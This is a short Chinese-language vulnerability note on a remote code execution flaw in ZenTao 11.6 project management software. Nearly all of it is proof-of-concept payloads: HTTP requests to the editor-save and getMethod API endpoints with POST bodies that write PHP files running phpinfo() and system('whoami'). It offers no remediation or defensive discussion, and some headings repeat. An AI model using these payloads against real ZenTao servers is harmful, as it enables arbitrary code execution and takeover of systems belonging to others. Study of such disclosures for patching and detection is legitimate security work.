禅道11.6RCE漏洞
漏洞范围¶
禅道 11.6
漏洞POC¶
文件写入
漏洞范围¶
禅道 11.6
漏洞POC¶
三.远程代码执行漏洞¶
1)远程代码执行命令phpnifo();
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111
POST: fileContent=<?php phpinfo(); ?>
Payload2:
http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1
POST: fileContent=<?php phpinfo(); ?>
2)远程代码执行命令system('whoami');
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222
POST: fileContent=<?php system('whoami'); ?>
Payload 2:
http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2
POST: fileContent=<?php system('whoami'); ?>